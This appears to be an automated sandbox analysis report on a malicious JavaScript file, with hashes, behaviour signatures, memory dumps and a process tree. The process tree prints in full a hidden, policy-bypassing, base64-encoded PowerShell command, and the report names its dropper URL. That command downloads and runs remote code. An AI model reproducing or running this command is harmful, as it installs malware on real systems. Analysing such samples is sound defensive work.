Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    30/12/2023, 17:10

General

  • Target

    0b7a3040f72ac6ff9a329d42a26beded.js

  • Size

    76KB

  • MD5

    0b7a3040f72ac6ff9a329d42a26beded

  • SHA1

    17cfb6dbe6b96450f56d75a326b5915d8452bee2

  • SHA256

    2e78808fda7f5ddda872d10b892bc8627beeb2856823eadafac361faba66bc81

  • SHA512

    c7d490245931ebafe529f10a54c19405ec22a45b37af3247529055ef2e33074add08d8456e6d6f13624b7c3ae12eb629a044efb89619974c86ef0fc325a259f7

  • SSDEEP

    1536:H9B1DAG59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzG:H9DDZ59Ry98guHVBqqg2bcruzUHmLKee

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://smart-integrator.hr/pornhub.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\0b7a3040f72ac6ff9a329d42a26beded.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2052
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA
    1⤵
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1684

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1684-5-0x000000001B770000-0x000000001BA52000-memory.dmp

    Filesize

    2.9MB

  • memory/1684-7-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

    Filesize

    9.6MB

  • memory/1684-10-0x0000000002E50000-0x0000000002ED0000-memory.dmp

    Filesize

    512KB

  • memory/1684-12-0x0000000002E50000-0x0000000002ED0000-memory.dmp

    Filesize

    512KB

  • memory/1684-11-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

    Filesize

    9.6MB

  • memory/1684-9-0x0000000002E50000-0x0000000002ED0000-memory.dmp

    Filesize

    512KB

  • memory/1684-8-0x0000000002E50000-0x0000000002ED0000-memory.dmp

    Filesize

    512KB

  • memory/1684-6-0x0000000001E00000-0x0000000001E08000-memory.dmp

    Filesize

    32KB

  • memory/1684-13-0x000007FEF5A00000-0x000007FEF639D000-memory.dmp

    Filesize

    9.6MB